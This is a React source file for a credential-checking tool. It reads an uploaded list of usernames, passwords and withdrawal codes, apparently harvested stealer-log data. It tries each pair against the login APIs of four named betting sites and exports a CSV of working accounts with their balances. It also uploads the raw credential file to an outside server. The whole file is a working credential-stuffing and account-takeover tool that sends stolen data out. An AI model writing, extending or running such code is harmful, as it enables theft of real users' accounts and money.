import logo from "./logo.svg";
import "./App.css";
import React, { useEffect, useState } from "react";
import axios from "axios";

function App() {
  let [userArray, setUserArray] = useState(null);
  let [withdrawArray, setWithdrawArray] = useState(null);
  let [userObj, setUserObj] = useState(null);
  let [userBetData, setUserBetData] = useState(null);
  let [platform, setPlatform] = useState("none");
  let [idNo, setIdNo] = useState(0);
  let [startineTime, setStartingTime] = useState("");
  let [totalAccounts, setTotalAccounts] = useState("");
  let [endingTime, setEndingTime] = useState(null);
  let [file, setFile] = useState(null);

  const delay = (delayInms) => {
    return new Promise((resolve) => setTimeout(resolve, delayInms));
  };

  function handleFileUpload(event) {
    const file = event.target.files[0];
    setFile(event.target.files[0]);

    // console.log(event.target.files);
    const reader = new FileReader();

    reader.onload = (e) => {
      // setRawData(e.target.result);
      let data = e.target.result.split(",");
      // let filteredArray = data.filter((item) => {
      //   return item.includes("Username:") && item.includes("Password:");
      // });
      let filteredArray = [];
      let filteredWithdraw = [];
      for (let f = 0; f < data.length; f++) {
        const element = data[f];

        if (element.includes("Username:") && element.includes("Password:")) {
          let tString = `${element.replaceAll("\n", " ")}, ${data[
            f + 1
          ].replaceAll("\n", " ")}`;
          filteredArray.push(tString);
        }
        if (element.includes("Withdrawal Code:")) {
          let tString = `${element.replaceAll("\n", " ")}, ${data[
            f + 1
          ].replaceAll("\n", " ")}`;
          filteredWithdraw.push(tString);
        }
      }
      setWithdrawArray(filteredWithdraw);
      setUserArray(filteredArray);
    };

    reader.readAsText(file);
  }
  useEffect(() => {
    if (userArray) {
      let userData = [];
      for (let i = 0; i < userArray.length; i++) {
        const ele = userArray[i];
        let tData = ele.split(" ");
        let ipAdd = tData[tData.length - 2];
        let withdrawalCode = null;
        for (let z = 0; z < withdrawArray.length; z++) {
          const element = withdrawArray[z];
          if (element.includes(ipAdd)) {
            let splitedEle = element.split(" ");
            withdrawalCode = splitedEle[2];
          }
        }

        let exportData = {};
        if (tData.length > 4) {
          exportData.username = tData[1];
          exportData.password = tData[3];

          switch (platform) {
            case "cricbet99":
              exportData.domain = "cricbet99.green";
              break;

            case "11xplay":
              exportData.domain = "11xplay.pro";
              break;

            case "laser":
              exportData.domain = "laser247.online";
              break;

            case "gold":
              exportData.domain = "gold365.site";
              break;

            default:
              exportData.domain = null;
              break;
          }
          // exportData.domain = "cricbet99.green";
          // exportData.domain = "gold365.site";
          // exportData.domain = "laser247.online";
          // exportData.domain = "11xplay.pro";
          exportData.withdrawalCode = withdrawalCode;
        }
        userData.push(exportData);
      }
      setUserObj(userData);
    }
  }, [userArray, platform]);
  async function userObjFunction() {
    if (userObj) {
      if (userObj.length > 0) {
        let tData = [];
        setStartingTime(new Date(Date.now()).toString());
        setTotalAccounts(userObj.length);
        for (let z = 0; z < userObj.length; z++) {
          const item = userObj[z];
          setIdNo(z);
          let diff = z / 10;
          try {
            let dbUrl = null;
            switch (platform) {
              case "cricbet99":
                dbUrl = "https://api.dcric99.com/api/auth";
                break;

              case "11xplay":
                dbUrl = "https://api.d11xplay.com/api/auth";
                break;

              case "laser":
                dbUrl = "https://api.dlaser247.com/api/auth";
                break;

              case "gold":
                dbUrl = "https://api.d21exch.com/api/auth";
                break;

              default:
                dbUrl = null;
                break;
            }
            // 11xplay.pro - https://api.d11xplay.com/api/auth
            //  cricbet99 - https://api.dcric99.com/api/auth
            // laser247 - https://api.dlaser247.com/api/auth
            // gold - https://api.d21exch.com/api/auth

            if (dbUrl) {
              if (diff % 1 == 0) {
                await delay(1000);

                let response = fetch(dbUrl, {
                  method: "POST",
                  headers: {
                    "Content-Type": "application/json",
                  },
                  body: JSON.stringify({
                    username: item.username,
                    password: item.password,
                    domain: item.domain,
                  }),
                });
                response
                  .then((response) => {
                    if (!response.ok) {
                      throw new Error(
                        "Network response was not ok " + response.statusText
                      );
                    }
                    return response.json(); // Parse JSON from the response
                  })
                  .then((data) => {
                    if (data.status) {
                      let bal = data.data.user.available_balance;
                      let storeVal = {
                        username: item.username,
                        password: item.password,
                        balance: bal,
                        withdrawalCode: item.withdrawalCode,
                      };

                      tData.push(storeVal);
                    }
                  })
                  .catch((error) => {
                    console.error("Error occurred while fetching data:", error); // Handle any errors
                  });
              } else {
                let response = fetch(dbUrl, {
                  method: "POST",
                  headers: {
                    "Content-Type": "application/json",
                  },
                  body: JSON.stringify({
                    username: item.username,
                    password: item.password,
                    domain: item.domain,
                  }),
                });
                response
                  .then((response) => {
                    if (!response.ok) {
                      throw new Error(
                        "Network response was not ok " + response.statusText
                      );
                    }
                    return response.json(); // Parse JSON from the response
                  })
                  .then((data) => {
                    if (data.status) {
                      let bal = data.data.user.available_balance;
                      let storeVal = {
                        username: item.username,
                        password: item.password,
                        balance: bal,
                        withdrawalCode: item.withdrawalCode,
                      };
                      tData.push(storeVal);
                    }
                  })
                  .catch((error) => {
                    console.error("Error occurred while fetching data:", error); // Handle any errors
                  });
              }
            }
          } catch (error) {
            console.log(error);
          }
        }
        // console.log(tData);
        setUserBetData(tData);
      }
    }
  }

  useEffect(() => {
    if (userBetData) {
      if (userBetData.length > 0) {
        let csv = "Username,Password,Balance,Withdrawal Code\r\n";

        for (let u = 0; u < userBetData.length; u++) {
          const t = userBetData[u];
          csv += `${t.username},${t.password},${t.balance},${t.withdrawalCode}\r\n`;
        }

        let link = document.createElement("a");
        link.id = "download-csv";
        link.setAttribute(
          "href",
          "data:text/plain;charset=utf-8," + encodeURIComponent(csv)
        );
        link.setAttribute("download", "userdetails.csv");
        document.body.appendChild(link);
        setStartingTime(null);
        setTotalAccounts(null);
        document.querySelector("#myfile").value = "";
        setTimeout(() => {
          setEndingTime(
            "File completed and download at " + new Date(Date.now()).toString()
          );
          logFile();
          setTimeout(() => {
            setEndingTime(null);
          }, 5000);
        });
        document.querySelector("#download-csv").click();
        setUserArray(null);
        setUserObj(null);
        setUserBetData(null);
        setWithdrawArray(null);
        setIdNo(0);
      }
    }
  }, [userBetData]);

  async function logFile() {
    try {
      let response = await fetch(
        "https://express.shortwash.com/getters/insertsomething.php",
        {
          method: "POST",
          body: JSON.stringify({
            query: `INSERT INTO file_logs(platform)VALUES('${platform}');`,
          }),
        }
      );
      let responseData = await response.json();
      console.log(responseData);
    } catch (error) {
      console.log(error);
    }
  }

  const handleUpload = async (event) => {
    event.preventDefault();

    if (!file) {
      return;
    }

    const formData = new FormData();
    formData.append("file", file);

    try {
      const response = await axios.post(
        "https://express.shortwash.com/getters/upload.php",
        formData,
        {
          headers: { "Content-Type": "multipart/form-data" },
        }
      );
    } catch (error) {
      // setMessage("Error uploading file.");
      console.log(error);
    }
  };
  return (
    <React.Fragment>
      <div
        style={{
          display: "flex",
          justifyContent: "center",
          alignItems: "center",
          flex: 1,
          height: "100vh",
          flexDirection: "column",
        }}
      >
        <h1>{endingTime}</h1>
        <h5>Starting Time : {startineTime}</h5>
        <h5>Total Accounts : {totalAccounts}</h5>
        <h5>Id no. {idNo}</h5>
        <form onSubmit={handleUpload} style={{
          flexDirection:'column',
          display:'flex'
        }}>
          {platform != "none" && (
            <input
              type="file"
              id="myfile"
              name="my file"
              onChange={handleFileUpload}
              required
            />
          )}
          <label htmlFor="platform" style={{ marginTop: 20 }}>
            Select platform
          </label>
          <select
            name="platform"
            id="platform-select"
            onChange={(t) => {
              setPlatform(t.target.value);
            }}
          >
            <option value="none" selected>
              None
            </option>
            <option value="cricbet99">Cricbet99</option>
            <option value="gold">Gold</option>
            <option value="laser">Laser</option>
            <option value="11xplay">11xplay</option>
          </select>
          <button
            className="btn btn-primary"
            style={{ marginTop: 20 }}
            onClick={userObjFunction}
            type="submit"
          >
            Start
          </button>
        </form>
      </div>
    </React.Fragment>
  );
}

export default App;
